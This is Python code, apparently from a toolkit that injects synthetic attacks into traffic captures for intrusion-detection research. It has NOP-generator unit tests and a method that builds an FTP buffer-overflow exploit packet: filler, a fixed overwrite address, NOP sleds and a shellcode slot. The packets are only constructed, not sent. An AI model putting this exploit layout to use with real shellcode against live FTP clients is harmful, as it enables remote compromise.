def test_get_rnd_x86_nop_with_sideeffects(self):
    """Check that every generated byte comes from one of the two NOP tables.

    Calls Utility.get_rnd_x86_nop(1000, False) and asserts, one subTest per
    position, that the byte is a member of Utility.x86_nops or of
    Utility.x86_pseudo_nops.
    """
    # NOTE(review): judging by the test name, passing False as the second
    # argument allows NOP-equivalents with side effects; confirm in Utility.
    generated = Utility.get_rnd_x86_nop(1000, False)
    for i, value in enumerate(generated):
        with self.subTest(i=i):
            single = value.to_bytes(1, "little")
            in_plain_table = single in Utility.x86_nops
            self.assertTrue(
                in_plain_table or single in Utility.x86_pseudo_nops)
def test_get_rnd_x86_nop_without_sideeffects(self):
    """Check that only plain NOP bytes are produced when the flag is True.

    Calls Utility.get_rnd_x86_nop(1000, True) and asserts, one subTest per
    position, that the byte is in Utility.x86_nops and is not in
    Utility.x86_pseudo_nops.
    """
    generated = Utility.get_rnd_x86_nop(1000, True)
    for i, value in enumerate(generated):
        with self.subTest(i=i):
            single = value.to_bytes(1, "little")
            # Both assertions matter: the byte must come from the plain
            # table and must not also appear in the pseudo-NOP table.
            self.assertIn(single, Utility.x86_nops)
            self.assertNotIn(single, Utility.x86_pseudo_nops)
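def generate_attack_packets(self):
    """
    Creates the attack packets.

    Builds a synthetic TCP conversation between a client ("victim",
    IP_SOURCE / MAC_SOURCE) and a server ("attacker", IP_DESTINATION /
    MAC_DESTINATION) and stores it in self.packets. Nothing in this method
    transmits the packets; they are only constructed, timestamped and
    appended to the list.

    Packet order: SYN, SYN/ACK, ACK, one server-to-client data packet
    (flags 'PA') carrying the FTP reply, FIN/ACK from the server, and two
    ACKs from the client.

    Layout of the FTP reply payload, in order:
    b'220', 2065 random bytes, four fixed bytes, 10 NOP bytes, a
    1000-byte payload slot, 20 NOP bytes, b'\\r\\n'.

    The payload slot is filled from CUSTOM_PAYLOAD, else from
    CUSTOM_PAYLOAD_FILE, else with random bytes. Shorter payloads are
    padded with NOP bytes up to custom_payload_limit.

    Side effects: sets self.attack_start_utime and replaces self.packets.
    """
    pps = self.get_param_value(atkParam.Parameter.PACKETS_PER_SECOND)

    # Timestamp
    timestamp_next_pkt = self.get_param_value(
        atkParam.Parameter.INJECT_AT_TIMESTAMP)
    # store start time of attack
    self.attack_start_utime = timestamp_next_pkt

    # Initialize parameters
    ip_victim = self.get_param_value(atkParam.Parameter.IP_SOURCE)
    ip_attacker = self.get_param_value(atkParam.Parameter.IP_DESTINATION)
    mac_victim = self.get_param_value(atkParam.Parameter.MAC_SOURCE)
    mac_attacker = self.get_param_value(atkParam.Parameter.MAC_DESTINATION)

    custom_payload = self.get_param_value(
        atkParam.Parameter.CUSTOM_PAYLOAD)
    custom_payload_len = len(custom_payload)
    custom_payload_limit = 1000
    # Early check on the parameter as given (character count). The byte
    # length is checked again after encoding, further down.
    # NOTE(review): what check_payload_len does on violation is not visible
    # here.
    Util.check_payload_len(custom_payload_len, custom_payload_limit)

    self.packets = []

    # Create random victim if specified
    if self.get_param_value(atkParam.Parameter.IP_SOURCE_RANDOMIZE):
        # The most used IP class in background traffic
        most_used_ip_class = Util.handle_most_used_outputs(
            self.statistics.get_most_used_ip_class())
        ip_victim = self.generate_random_ipv4_address(
            most_used_ip_class, 1)
        mac_victim = self.generate_random_mac_address()

    # Get MSS, TTL and Window size value for victim/attacker IP
    victim_mss_value, victim_ttl_value, victim_win_value = self.get_ip_data(
        ip_victim)
    attacker_mss_value, attacker_ttl_value, attacker_win_value = self.get_ip_data(
        ip_attacker)

    min_delay, max_delay = self.get_reply_delay(ip_attacker)

    # Initial sequence numbers only need to look plausible in a capture;
    # this is simulation data, not a security-sensitive random value.
    attacker_seq = rnd.randint(1000, 50000)
    victim_seq = rnd.randint(1000, 50000)

    sport = Util.generate_source_port_from_platform("win7")

    # connection request from victim (client)
    victim_ether = inet.Ether(src=mac_victim, dst=mac_attacker)
    victim_ip = inet.IP(src=ip_victim, dst=ip_attacker,
                        ttl=victim_ttl_value, flags='DF')
    request_tcp = inet.TCP(sport=sport, dport=ftp_port,
                           window=victim_win_value, flags='S',
                           seq=victim_seq,
                           options=[('MSS', victim_mss_value)])
    victim_seq += 1
    syn = (victim_ether / victim_ip / request_tcp)
    syn.time = timestamp_next_pkt
    timestamp_next_pkt = Util.update_timestamp(timestamp_next_pkt, pps,
                                               min_delay)
    self.packets.append(syn)

    # response from attacker (server)
    attacker_ether = inet.Ether(src=mac_attacker, dst=mac_victim)
    attacker_ip = inet.IP(src=ip_attacker, dst=ip_victim,
                          ttl=attacker_ttl_value, flags='DF')
    reply_tcp = inet.TCP(sport=ftp_port, dport=sport, seq=attacker_seq,
                         ack=victim_seq, flags='SA',
                         window=attacker_win_value,
                         options=[('MSS', attacker_mss_value)])
    attacker_seq += 1
    synack = (attacker_ether / attacker_ip / reply_tcp)
    synack.time = timestamp_next_pkt
    timestamp_next_pkt = Util.update_timestamp(timestamp_next_pkt, pps,
                                               min_delay)
    self.packets.append(synack)

    # acknowledgement from victim (client)
    ack_tcp = inet.TCP(sport=sport, dport=ftp_port, seq=victim_seq,
                       ack=attacker_seq, flags='A',
                       window=victim_win_value,
                       options=[('MSS', victim_mss_value)])
    ack = (victim_ether / victim_ip / ack_tcp)
    ack.time = timestamp_next_pkt
    timestamp_next_pkt = Util.update_timestamp(timestamp_next_pkt, pps)
    self.packets.append(ack)

    # FTP exploit packet
    # NOTE(review): the whole reply (3 + 2065 + 4 + 10 + 1000 + 20 + 2 =
    # 3104 bytes) goes into a single TCP segment, whatever MSS value is
    # advertised in the options. A real capture would likely show it
    # segmented; confirm this is acceptable for the generated dataset. The
    # unusually long single-line "220" reply is also the feature a
    # detection rule would most plausibly key on.
    ftp_tcp = inet.TCP(sport=ftp_port, dport=sport, seq=attacker_seq,
                       ack=victim_seq, flags='PA',
                       window=attacker_win_value,
                       options=[('MSS', attacker_mss_value)])

    characters = b'220'
    characters += Util.get_rnd_bytes(2065, Util.forbidden_chars)
    characters += b'\x96\x72\x01\x68'
    characters += Util.get_rnd_x86_nop(10, False, Util.forbidden_chars)

    custom_payload_file = self.get_param_value(
        atkParam.Parameter.CUSTOM_PAYLOAD_FILE)

    # Generation of payload of the FTP exploit packet
    if custom_payload == '':
        if custom_payload_file == '':
            payload = Util.get_rnd_bytes(custom_payload_limit,
                                         Util.forbidden_chars)
        else:
            # NOTE(review): the path is taken from the parameter as-is and
            # no path validation is visible here; validate it upstream if
            # parameters can come from an untrusted source.
            payload = ID2TLib.Utility.get_bytes_from_file(
                custom_payload_file)
            Util.check_payload_len(len(payload), custom_payload_limit)
            payload += Util.get_rnd_x86_nop(
                custom_payload_limit - len(payload), False,
                Util.forbidden_chars)
    else:
        # Size the padding from the encoded byte length, not the character
        # count: a non-ASCII payload encodes to more bytes than it has
        # characters, which previously pushed the slot past
        # custom_payload_limit. This mirrors the length check applied to
        # file payloads above.
        encoded_payload = custom_payload.encode()
        encoded_payload_len = len(encoded_payload)
        Util.check_payload_len(encoded_payload_len, custom_payload_limit)
        payload = Util.get_rnd_x86_nop(
            custom_payload_limit - encoded_payload_len, False,
            Util.forbidden_chars)
        payload += encoded_payload

    characters += payload
    characters += Util.get_rnd_x86_nop(20, False, Util.forbidden_chars)
    characters += b'\r\n'

    ftp_tcp.add_payload(characters)

    ftp_buff = (attacker_ether / attacker_ip / ftp_tcp)
    ftp_buff.time = timestamp_next_pkt
    timestamp_next_pkt = Util.update_timestamp(timestamp_next_pkt, pps)
    self.packets.append(ftp_buff)
    # Advance the server sequence number by the bytes just sent so the
    # FIN/ACK and the client ACKs below carry consistent numbers.
    attacker_seq += len(ftp_tcp.payload)

    # Fin Ack from attacker
    fin_ack_tcp = inet.TCP(sport=ftp_port, dport=sport, seq=attacker_seq,
                           ack=victim_seq, flags='FA',
                           window=attacker_win_value,
                           options=[('MSS', attacker_mss_value)])
    fin_ack = (attacker_ether / attacker_ip / fin_ack_tcp)
    fin_ack.time = timestamp_next_pkt
    timestamp_next_pkt = Util.update_timestamp(timestamp_next_pkt, pps,
                                               min_delay)
    self.packets.append(fin_ack)

    # Ack from victim on FTP packet
    ftp_ack_tcp = inet.TCP(sport=sport, dport=ftp_port, seq=victim_seq,
                           ack=attacker_seq, flags='A',
                           window=victim_win_value,
                           options=[('MSS', victim_mss_value)])
    ftp_ack = (victim_ether / victim_ip / ftp_ack_tcp)
    ftp_ack.time = timestamp_next_pkt
    timestamp_next_pkt = Util.update_timestamp(timestamp_next_pkt, pps)
    self.packets.append(ftp_ack)

    # Ack from victim on Fin/Ack of attacker
    # The FIN consumes one sequence number, hence attacker_seq + 1.
    fin_ack_ack_tcp = inet.TCP(sport=sport, dport=ftp_port, seq=victim_seq,
                               ack=attacker_seq + 1, flags='A',
                               window=victim_win_value,
                               options=[('MSS', victim_mss_value)])
    fin_ack_ack = (victim_ether / victim_ip / fin_ack_ack_tcp)
    fin_ack_ack.time = timestamp_next_pkt
    self.packets.append(fin_ack_ack)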
def test_get_rnd_x86_nop_single_filter(self):
    """Check that a single excluded byte never appears in the output.

    Calls Utility.get_rnd_x86_nop(1000, False, b'\\x20') and asserts, one
    subTest per position, that the byte differs from b'\\x20'.
    """
    excluded = b'\x20'
    generated = Utility.get_rnd_x86_nop(1000, False, excluded)
    for i, value in enumerate(generated):
        with self.subTest(i=i):
            single = value.to_bytes(1, "little")
            self.assertNotEqual(single, excluded)
def test_get_rnd_x86_nop_filter(self):
    """Check that filtering out the whole plain-NOP table is honoured.

    Passes a copy of Utility.x86_nops as the third argument of
    Utility.get_rnd_x86_nop(1000, False, ...) and asserts, one subTest per
    position, that no returned byte is a member of Utility.x86_nops.
    """
    # A copy is passed so the call cannot alter the shared table that the
    # assertions below compare against.
    excluded = Utility.x86_nops.copy()
    generated = Utility.get_rnd_x86_nop(1000, False, excluded)
    for i, value in enumerate(generated):
        with self.subTest(i=i):
            single = value.to_bytes(1, "little")
            self.assertNotIn(single, Utility.x86_nops)
def test_get_rnd_x86_nop_len(self):
    """Check that the result has exactly the requested length (1000)."""
    requested = 1000
    generated = Utility.get_rnd_x86_nop(requested)
    self.assertEqual(len(generated), requested)